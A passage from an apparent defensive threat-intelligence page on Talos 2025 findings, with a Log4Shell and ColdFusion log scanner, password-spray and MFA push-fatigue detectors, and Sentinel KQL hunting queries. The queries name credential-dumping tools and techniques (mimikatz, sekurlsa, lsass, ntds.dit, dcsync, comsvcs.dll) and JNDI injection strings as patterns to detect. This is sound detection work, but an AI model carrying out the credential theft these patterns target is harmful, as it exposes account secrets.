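CF_PATHS = ("/cfide/administrator/", "/flex2gateway/")

def _resolve(m):
    """Evaluate one innermost lookup the way Log4j 2's StrSubstitutor would."""
    content = m.group(1)
    low = content.lower()
    if low.startswith("jndi:"):
        return "\x01" + content + "\x02"          # freeze it so it is not matched again
    if ":-" in content:                            # ${key:-default}: empty/unknown key yields the default
        return content.rsplit(":-", 1)[1]
    if low.startswith("lower:"):
        return content[6:].lower()
    if low.startswith("upper:"):
        return content[6:].upper()
    return content                                 # other lookups: drop the wrapper, keep the text

def normalize(value, max_rounds=32):
    """URL-decode, then resolve nested lookups inside-out until no ${...} remains."""
    s = unquote(value)
    for _ in range(max_rounds):                    # every round removes at least one ${...}
        s, n = INNERMOST.subn(_resolve, s)
        if n == 0:
            break
    return s

def jndi_target(value):
    """Return the JNDI URI a vulnerable Log4j would dereference for this input, or None."""
    m = JNDI_URI.search(normalize(value))
    return m.group(1) if m else None

def scan_access_log(text):
    """Flag Log4Shell probes in any logged field and ColdFusion admin/gateway probing by path."""
    findings = []
    for line in text.strip().splitlines():
        m = COMBINED.match(line)
        if not m:
            continue
        ip, _ts, request, status, referer, agent = m.groups()
        path = request.split(" ")[1] if " " in request else request
        for field, value in (("request", request), ("referer", referer), ("user_agent", agent)):
            uri = jndi_target(value)
            if uri:
                findings.append({"ip": ip, "status": int(status), "field": field,
                                 "reason": "log4shell", "payload": uri})
        if unquote(path).lower().startswith(CF_PATHS):
            findings.append({"ip": ip, "status": int(status), "field": "request",
                             "reason": "coldfusion_admin_probe", "payload": path})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f)
```

The payload in a finding is the resolved callback URI, which is what to pivot on in flow data (Step 1's TCP 1389/389/636/1099 check) and what to block. A 404 or 403 on the probe line does not mean the attempt failed: the header or query string is logged by the application regardless of the response, and the lookup fires when that string is logged.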
Detection Guidance
Talos' findings map to several high-value detection opportunities across the five vectors.
For identity and authentication abuse: monitor authentication logs for MFA push fatigue patterns (multiple push requests in short succession for a single account), impossible travel events, and session token reuse from new or anomalous IP ranges.
Alert on PAM session initiations outside business hours or from unexpected source addresses.
Review for T1556 and T1556.006 indicators, specifically modifications to authentication provider configurations or conditional access policies.
For EOL system exploitation: query your asset inventory against published EOL dates for all network-facing systems. Cross-reference with vulnerability scan results for CVEs affecting Log4j (CVE-2021-44228 and related), Adobe ColdFusion, and PHP frameworks. Prioritize assets with no available vendor patch path; these require compensating controls or isolation.
For trust-broker compromise: establish baseline traffic profiles for all VPNs, ADCs, and firewalls. Alert on configuration changes, unexpected authentication attempts, and outbound connections to non-standard destinations from these devices. Review for T1133 patterns: authentication to external remote services from internal service accounts.
For Active Directory abuse: enable and baseline AD audit logging, focusing on Group Policy Object modifications (T1484), Kerberoastable account queries, NTDS.dit access attempts (T1003), and new trust relationship creation. Run tools such as BloodHound CE on a recurring schedule (monthly or quarterly) and baseline the results so that changes in AD attack paths stand out.
For AI-assisted reconnaissance: monitor for high-volume, structured reconnaissance patterns (T1595) that suggest automation: port scanning at a fixed cadence, subdomain enumeration bursts, or LinkedIn scraping activity. These precede the phishing (T1566) and exploitation phases and represent an early-warning opportunity that is often ignored.
Log sources to prioritize: identity provider authentication logs, PAM session logs, VPN/firewall authentication and configuration change logs, Windows Security Event Log (event IDs 4624, 4625, 4648, 4672, 4768, 4769, 4776), and Active Directory replication logs.
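Detection logic for the MFA push fatigue and credential stuffing/password spray patterns described in this section, which also serves as the per-source-IP failure-burst check that Step 2's syslog compensating control sketches; added example, not code from Talos or from this page. It assumes a collector has already flattened VPN failures, AD Event ID 4771/4776 failures and IdP push events into one record shape; the events are constructed, and the thresholds are starting points to tune against your own baseline.

```python
"""Sliding-window detection of password spray and MFA push fatigue.

Added example, not from the Talos report or this page. It assumes a collector
has normalised VPN syslog failures, AD Event ID 4771/4776 failures and IdP MFA
push events into one record shape (constructed sample below, IPs from the
RFC 5737 documentation ranges). Thresholds are starting points; tune them
against your own authentication baseline.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

def _t(hhmmss, plus_s=0):
    return datetime.fromisoformat("2025-03-10T" + hhmmss) + timedelta(seconds=plus_s)

EVENTS = (  # constructed sample records
    # one source, eight accounts, one failure each inside 70 seconds: spray (T1078 precursor)
    [{"ts": _t("09:00:00", 10 * i), "source": "ad-4771", "user": f"user{i:02d}",
      "ip": "198.51.100.23", "outcome": "fail"} for i in range(8)]
    # an ordinary user mistyping a VPN password once
    + [{"ts": _t("09:05:00"), "source": "vpn", "user": "bob", "ip": "203.0.113.7", "outcome": "fail"},
       {"ts": _t("09:05:20"), "source": "vpn", "user": "bob", "ip": "203.0.113.7", "outcome": "success"}]
    # four pushes to alice in three minutes, then an approval: push bombing that worked (T1621)
    + [{"ts": _t(f"10:0{i}:00"), "source": "mfa-push", "user": "alice", "ip": "192.0.2.44",
        "outcome": "push_sent"} for i in range(4)]
    + [{"ts": _t("10:03:30"), "source": "mfa-push", "user": "alice", "ip": "192.0.2.44",
        "outcome": "push_approved"}]
    # a normal single push and approval
    + [{"ts": _t("11:00:00"), "source": "mfa-push", "user": "carol", "ip": "203.0.113.9", "outcome": "push_sent"},
       {"ts": _t("11:00:08"), "source": "mfa-push", "user": "carol", "ip": "203.0.113.9", "outcome": "push_approved"}]
)

def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """One source IP failing against many distinct accounts inside the window."""
    alerts = {}
    recent = defaultdict(deque)          # ip -> (ts, user) failures still inside the window
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["outcome"] != "fail":
            continue
        q = recent[e["ip"]]
        q.append((e["ts"], e["user"]))
        while q and e["ts"] - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if len(users) >= min_accounts:
            a = alerts.setdefault(e["ip"], {"rule": "password_spray", "ip": e["ip"],
                                           "accounts": 0, "first": q[0][0], "last": e["ts"]})
            a["accounts"] = max(a["accounts"], len(users))   # keep the peak, not the first crossing
            a["last"] = e["ts"]
    return list(alerts.values())

def detect_push_fatigue(events, window=timedelta(minutes=5), min_pushes=3):
    """Repeated pushes to one user inside the window; an approval right after the burst is the bad case."""
    alerts = {}
    recent = defaultdict(deque)          # user -> timestamps of pushes still inside the window
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["source"] != "mfa-push":
            continue
        q = recent[e["user"]]
        if e["outcome"] == "push_sent":
            q.append(e["ts"])
            while q and e["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= min_pushes:
                a = alerts.setdefault(e["user"], {"rule": "mfa_push_fatigue", "user": e["user"],
                                                 "ip": e["ip"], "pushes": 0, "approved_after_burst": False})
                a["pushes"] = max(a["pushes"], len(q))
        elif e["outcome"] == "push_approved" and e["user"] in alerts and q and e["ts"] - q[-1] <= window:
            alerts[e["user"]]["approved_after_burst"] = True   # treat the session as attacker-held

    return list(alerts.values())

def run_all(events):
    return detect_password_spray(events) + detect_push_fatigue(events)

if __name__ == "__main__":
    for alert in run_all(EVENTS):
        print(alert)
```

Spray detection keys on distinct accounts per source rather than raw failure counts, which is what separates a spray from one locked-out user, and it reports the peak account count instead of the first threshold crossing so the alert carries the full scope. For push fatigue the approval flag is the field to route on: a burst without an approval is a user to warn, a burst followed by an approval is a session to revoke.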
Indicators of Compromise (1)
Type: TOOL
Value: Pending — refer to Cisco Talos 2025 Year in Review report for published indicators
Context: C2 infrastructure details, payload hashes, and campaign-specific IOCs are documented in the full Talos 2025 Year in Review report. The source article URL provided does not surface specific indicator values; retrieve them directly from the Talos report PDF at the source URL listed.
Confidence: LOW
Platform Playbooks: Microsoft Sentinel / Defender, CrowdStrike Falcon, AWS Security
Microsoft 365 E3 (3 log sources): basic identity + audit. No endpoint advanced hunting; Defender for Endpoint requires a separate P1/P2 license.
Microsoft 365 E5 (18 log sources): full Defender suite (Endpoint P2, Identity, Office 365 P2, Cloud App Security); advanced hunting across all workloads.
E5 + Sentinel (27 log sources): all E5 tables plus SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence); analytics rules, playbooks, workbooks.
Query legend: hard indicator (direct match); contextual (behavioral query); shared platform (review required).
IOC Detection Queries
No IOC-based query is available for this item. The single indicator entry above is a placeholder rather than an indicator value, so there is no file name, hash, domain, or address to match against DeviceProcessEvents, and a query built from the placeholder text would never fire. Use the MITRE ATT&CK hunting queries below until Talos publishes indicator values, then add those as hard-indicator matches.
MITRE ATT&CK Hunting Queries (6)
Sentinel rule: Web application exploit patterns
KQL Query Preview
Read-only — detection query only
CommonSecurityLog
| where TimeGenerated > ago(7d)
| where DeviceVendor has_any ("PaloAlto", "Fortinet", "F5", "Citrix")
// has_any is term-based and cannot match punctuation-only patterns such as "../", so the URL check uses a regex
| where Activity has_any ("attack", "exploit", "injection", "traversal", "overflow")
    or RequestURL matches regex @"(?i)\.\./|\.\.\\|<script|UNION\s+SELECT|\$\{jndi:"
| project TimeGenerated, DeviceVendor, SourceIP, DestinationIP, RequestURL, Activity, LogSeverity
| sort by TimeGenerated desc
Sentinel rule: Privilege escalation / account modification
KQL Query Preview
Read-only — detection query only
AuditLogs
| where TimeGenerated > ago(7d)
| where OperationName has_any ("Add member to role", "Add app role assignment", "Add owner to application", "Reset user password")
| extend Target = tostring(TargetResources[0].userPrincipalName), Actor = tostring(InitiatedBy.user.userPrincipalName)
| project TimeGenerated, OperationName, Actor, Target, Result
| sort by TimeGenerated desc
Sentinel rule: Lateral movement via RDP / SMB / WinRM
KQL Query Preview
Read-only — detection query only
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (3389, 5985, 5986, 445, 135)
| where LocalIP != RemoteIP
| summarize ConnectionCount = count(), TargetDevices = dcount(RemoteIP) by DeviceName, InitiatingProcessFileName
| where ConnectionCount > 10 or TargetDevices > 3
| sort by TargetDevices desc
Sentinel rule: Credential dumping / LSASS access
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("procdump.exe", "mimikatz.exe", "sekurlsa.exe")
or ProcessCommandLine has_any ("lsass", "sekurlsa", "logonpasswords", "sam hive", "ntds.dit", "dcsync")
or (FileName =~ "rundll32.exe" and ProcessCommandLine has "comsvcs.dll")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Phishing email delivery
KQL Query Preview
Read-only — detection query only
EmailEvents
| where Timestamp > ago(7d)
| where ThreatTypes has "Phish" or DetectionMethods has "Phish"
| summarize Attachments = make_set(AttachmentCount), Urls = make_set(UrlCount) by NetworkMessageId, Timestamp, SenderFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes
| sort by Timestamp desc
Sentinel rule: Sign-ins from unusual locations
KQL Query Preview
Read-only — detection query only
SigninLogs
| where TimeGenerated > ago(7d)
| where ResultType == "0"   // ResultType is a string column; "0" is a successful sign-in
| where isnotempty(UserPrincipalName)
| summarize Locations = make_set(Location), LoginCount = count(), DistinctIPs = dcount(IPAddress) by UserPrincipalName
| where array_length(Locations) > 3 or DistinctIPs > 5
| sort by DistinctIPs desc
No actionable IOCs for CrowdStrike import (benign/contextual indicators excluded).
No hard IOCs available for AWS detection queries (contextual/benign indicators excluded).
Compliance Framework Mappings
MITRE ATT&CK: T1484, T1621, T1190, T1098.005, T1539, T1021 (+11 more)
NIST SP 800-53: CA-8, RA-5, SC-7, SI-2, SI-7, AC-17 (+17 more)
CIS Controls v8: 16.4, 6.3, 6.4, 6.5, 7.3, 7.4 (+4 more)
HIPAA: 164.312(d), 164.308(a)(5)(i)
ISO/IEC 27001:2022 Annex A: A.8.8, A.5.34, A.5.21, A.8.24
MITRE ATT&CK Mapping
T1484 Domain or Tenant Policy Modification (defense-evasion)
T1621 Multi-Factor Authentication Request Generation (credential-access)
T1190 Exploit Public-Facing Application (initial-access)
T1539 Steal Web Session Cookie (credential-access)
T1021 Remote Services (lateral-movement)
T1003 OS Credential Dumping (credential-access)
T1589 Gather Victim Identity Information (reconnaissance)
T1566 Phishing (initial-access)
T1550.001 Application Access Token (defense-evasion)
T1133 External Remote Services (persistence)
T1078 Valid Accounts (defense-evasion)
T1556 Modify Authentication Process (credential-access)
T1595 Active Scanning (reconnaissance)
T1556.006 Multi-Factor Authentication (credential-access)
T1068 Exploitation for Privilege Escalation (privilege-escalation)
Guidance Disclaimer
The analysis, framework mappings, and incident response recommendations in this intelligence
item are derived from established industry standards including NIST SP 800-61, NIST SP 800-53,
CIS Controls v8, MITRE ATT&CK, and other recognized frameworks. This content is provided
as supplemental intelligence guidance only and does not constitute professional incident response
services. Organizations should adapt all recommendations to their specific environment, risk
tolerance, and regulatory requirements. This material is not a substitute for your organization's
official incident response plan, legal counsel, or qualified security practitioners.